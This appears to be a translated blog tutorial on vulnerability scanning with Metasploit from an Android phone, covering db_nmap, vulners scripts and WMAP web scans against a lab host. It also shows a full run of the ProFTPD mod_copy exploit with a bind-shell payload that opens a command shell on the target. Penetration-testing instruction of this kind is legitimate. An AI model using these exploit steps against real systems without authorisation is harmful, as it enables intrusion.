During my testing of Kali Nethunter on OnePlus, I was looking for tools and workflows that could run on something as light as an Android phone. I also want to see how far I can go without having to use an external VPS or Server.
| Join the channel Telegram of the AnonyViet 👉 Link 👈 |
Vulnerability scanning with OpenVAS, Nessus, or anything else that runs fine on lightweight hardware. In my experience, a dedicated vulnerability scanner will be quite resource intensive.
So, using Metasploit as my primary tool for exploiting vulnerable software, I wanted to share some of the tips I’ve found for performing vulnerability scanning using Metasploit.
Nmap + Metasploit
I recently discovered that you can use nmap directly from Metasploit using the module db_nmap. Using this module is quite nice as you can get the results imported directly into Metasploit.
Here is an example of the db_nmap command in Metasploit:
msf6 > db_nmap -sV 192.168.1.5
Here is the output (this server is running Docker containers are vulnerable):
msf6 > db_nmap -sV 192.168.1.5 [*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 03:47 UTC [*] Nmap: Nmap scan report for 192.168.1.5 (192.168.1.5) [*] Nmap: Host is up (0.12s latency). [*] Nmap: rDNS record for 192.168.1.5: 192.168.1.5.vultr.com [*] Nmap: Not shown: 991 closed ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 21/tcp open ftp ProFTPD 1.3.5 [*] Nmap: 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) [*] Nmap: 25/tcp filtered smtp [*] Nmap: 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) [*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) [*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) [*] Nmap: 631/tcp open ipp CUPS 1.7 [*] Nmap: 6667/tcp open irc UnrealIRCd [*] Nmap: Service Info: Hosts: VULN, irc.TestIRC.net; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel [*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds
Now, Metasploit knows about the services on that server. Check by command services :
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.5 21 tcp ftp open ProFTPD 1.3.5
192.168.1.5 22 tcp ssh open OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 Ubuntu Linux; proto
col 2.0
192.168.1.5 25 tcp smtp filtered
192.168.1.5 80 tcp http open Apache httpd 2.4.7 (Ubuntu)
192.168.1.5 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5 631 tcp ipp open CUPS 1.7
192.168.1.5 6667 tcp irc open UnrealIRCd
With db_nmapit will automatically import vulnerabilities if you use any of nmap’s vulnerability scanning scripts.
Here is an example command:
msf6 > db_nmap -sV --script=vulners.nse 192.168.1.5
After completing that command, I can use the command vulns to check for exploits hosted in Metasploit that have been discovered using nmap:
msf6 > vulns Vulnerabilities =============== Timestamp Host Name References --------- ---- ---- ---------- 2021-08-08 03:55:55 UTC 192.168.1.5 cpe:/a:proftpd:proftpd:1.3.5 CVE-2015-3306,SAINT:950EB68D408A40399926A4CCAD3CC62E,SAINT:63FB77B9136D48259E4F0D4CDA35E957,SAINT:1B08F4664C428B180EEC9617B41D9A2C,PROFTPD_MOD_COPY,PACKETSTORM:162777,PACKETSTORM:132218,PACKETSTORM:131567,PACKETSTORM:131555,PACKETSTORM:131505,MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC,EDB-ID:49908,EDB-ID:37262,EDB-ID:36803,EDB-ID:36742,1337DAY-ID-23720,1337DAY-ID-23544,SSV:61050,MSF:ILITIES/SUSE-CVE-2019-18217/,CVE-2019-19272,CVE-2019-19271,CVE-2019-19270,CVE-2019-18217,CVE-2016-3125,CVE-2013-4359,CVE-2017-7418 <snipped>
You can see there is a vulnerability that Metasploit exploited in the above output of the files:
MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC
So let’s dig it:
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.1.5 RHOSTS => 192.168.1.5 msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/html SITEPATH => /var/www/html msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/bind_awk payload => cmd/unix/bind_awk msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run [*] 192.168.1.5:80 - 192.168.1.5:21 - Connected to FTP server [*] 192.168.1.5:80 - 192.168.1.5:21 - Sending copy commands to FTP server [*] 192.168.1.5:80 - Executing PHP payload /VlrUb.php [*] Started bind TCP handler against 192.168.1.5:4444 [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.5:4444) at 2021-08-08 04:21:30 +0000
The shell is created using the results of a vulnerability scan performed on an Android phone.
I recommend using additional nmap vulnerability scanning scripts with the module db_nmap by Metasploit.
Scan for web application vulnerabilities
Metasploit has a built-in web application vulnerability scanning module: WMAP:
The WMAP documentation in someone else’s old Github repo explains what makes WMAP special:
https://github.com/lattera/metasploit/blob/master/documentation/wmap.txt
Looks like it hasn’t been updated in 10 years. As explained in the link above, WMAP will use the information stored in the database to intelligently attack your target. In addition, you can create WMAP profiles to use newer or even custom modules in Metasploit – this makes WMAP extensible and still relevant today.
First, download wmap and configure your target:
msf6 > load wmap
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] === et [ ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf6 > wmap_sites -a http://192.168.1.5
[*] Site created.
msf6 > wmap_targets -t http://192.168.1.5/drupal
msf6 > wmap_targets -l
[*] Defined targets
===============
Id Vhost Host Port SSL Path
-- ----- ---- ---- --- ----
0 192.168.1.5 192.168.1.5 80 false /drupal
Next, run a test against your target:
msf6 > wmap_run -t [*] Testing target: [*] Site: 192.168.1.5 (192.168.1.5) [*] Port: 80 SSL: false ============================================================ [*] Testing started. 2021-08-08 04:43:27 +0000 [*] Loading wmap modules... <snipped>
Finally, run the scan command:
msf6 > wmap_run -e [*] Using ALL wmap enabled modules. [-] NO WMAP NODES DEFINED. Executing local modules [*] Testing target: [*] Site: 192.168.1.5 (192.168.1.5) [*] Port: 80 SSL: false ============================================================ [*] Testing started. 2021-08-08 04:50:06 +0000 [*] =[ SSL testing ]= ============================================================ [*] Target is not SSL. SSL modules disabled. [*] =[ Web Server testing ]= ============================================================ [*] Module auxiliary/scanner/http/http_version [+] 192.168.1.5:80 Apache/2.4.7 (Ubuntu) [*] Module auxiliary/scanner/http/open_proxy [*] Module auxiliary/admin/http/tomcat_administration <snipped>
Use custom WMAP profiles
In the Metasploit Github repo there is some documentation on how you can extend WMAP to use other modules using the WMAP configuration:
Here is the file:
# # WMAP 1.0 Sample Profile # wmap_run -e /path/to/profile # # Just add the name of the module. Use # for comments # frontpage frontpage_login options version backup_file #blind_sql_query #brute_dirs copy_of_file dir_listing dir_scanner file_same_name_dir writable
You can see from the comments in the file that you can extend WMAP to use other modules. This makes WMAP really useful as you can test newer or custom Metasploit modules on Web Server.
So as a simple example you can use that example config, put it in /tmp/wmap-profile and then run the WMAP configuration with the following command in Metasploit:
msf6 > wmap_run -e /tmp/wmap-profile
As I said earlier, this makes WMAP extensible and will probably keep it useful forever as Rapid 7 continues to create and update Metasploit modules.
